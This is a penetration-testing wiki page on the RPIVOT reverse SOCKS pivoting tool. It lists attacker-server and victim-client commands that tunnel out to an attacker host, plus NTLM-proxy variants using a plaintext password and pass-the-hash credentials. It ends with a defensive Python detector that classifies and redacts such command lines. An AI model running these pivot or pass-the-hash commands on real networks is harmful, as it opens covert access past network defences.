Rpivot

From RCATs

Description

RPIVOT is a tool that provides secure and flexible access to an internal network by tunneling traffic through a SOCKS 4 proxy. It operates in the opposite direction to SSH dynamic port forwarding, allowing you to pivot into an internal network from an external system. This makes it a convenient way to bypass network restrictions and reach internal resources without direct connections. It is particularly useful for penetration testers, security professionals, and network administrators who need to access internal networks from remote locations.

Commands

Basic Usage[1]

# Attacker Machine
python server.py --server-port 9999 --server-ip 0.0.0.0 --proxy-ip 127.0.0.1 --proxy-port 1080

# Victim Machine
python client.py --server-ip <rpivot_server_ip> --server-port 9999

Pivot Through NTLM Proxy

python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --password P@ssw0rd

Pass The Hash

python client.py --server-ip <rpivot_server_ip> --server-port 9999 --ntlm-proxy-ip <proxy_ip> --ntlm-proxy-port 8080 --domain CONTOSO.COM --username Alice --hashes 9b9850751be2515c8231e5189015bbe6:49ef7638d69a01f26d96ed673bf50c45

More Commands

# Attack host
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0

# Pivot Target
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
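
Detection-side view of the command lines above, as an added example that is not part of the original page or of the rpivot project: it classifies process-creation command lines by the option names shown on this page and redacts `--password` and `--hashes` values before the finding is stored. The function names, the sample event and its addresses are constructed for illustration, and it assumes command-line logging is available.

```python
import shlex
# Option names exactly as they appear in the command lines on this page.
SERVER_ONLY = {"--proxy-ip", "--proxy-port"}
CLIENT_ONLY = {"--ntlm-proxy-ip", "--ntlm-proxy-port", "--domain",
               "--username", "--password", "--hashes"}
SECRETS = {"--password", "--hashes"}

def parse_options(cmdline):
    """Return ({--flag: value}, command line with secret values redacted)."""
    try:
        tokens = shlex.split(cmdline)  # POSIX quoting; backslashes are consumed
    except ValueError:                 # unbalanced quote in a truncated field
        tokens = cmdline.split()
    opts, shown, i = {}, [], 0
    while i < len(tokens):
        flag, eq, value = tokens[i].partition("=")   # accepts --flag=value too
        if flag.startswith("--"):
            if not eq and i + 1 < len(tokens) and not tokens[i + 1].startswith("--"):
                i += 1
                value = tokens[i]
            opts[flag] = value
            shown += [flag, "<redacted>" if flag in SECRETS else value]
        else:
            shown.append(tokens[i])
        i += 1
    return opts, " ".join(s for s in shown if s)

def classify(cmdline):
    """Return a finding dict for an rpivot-style invocation, else None."""
    opts, redacted = parse_options(cmdline)
    keys = set(opts)
    # Client and server both take --server-ip and --server-port.
    if not {"--server-ip", "--server-port"} <= keys:
        return None
    if SERVER_ONLY & keys:
        role = "server"
    elif CLIENT_ONLY & keys or "client.py" in cmdline:
        role = "client"
    else:  # bare form: fall back to the script name
        role = "server" if "server.py" in cmdline else "unknown"
    return {"role": role, "cmdline": redacted,
            "endpoint": opts["--server-ip"] + ":" + opts["--server-port"],
            "via_ntlm_proxy": "--ntlm-proxy-ip" in opts,
            "pass_the_hash": "--hashes" in opts}

# Constructed process-creation event (renamed script, documentation addresses).
SAMPLE_EVENT = ("python2.7 /tmp/c.py --server-ip 203.0.113.7 --server-port 9999 "
                "--ntlm-proxy-ip 192.0.2.10 --ntlm-proxy-port 8080 "
                "--domain EXAMPLE --username svc --hashes 00:00")
FINDING = classify(SAMPLE_EVENT)
```

Matching on option names survives a renamed script but not a modified copy of the tool, so treat a hit as one signal to correlate with proxy and network telemetry.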

References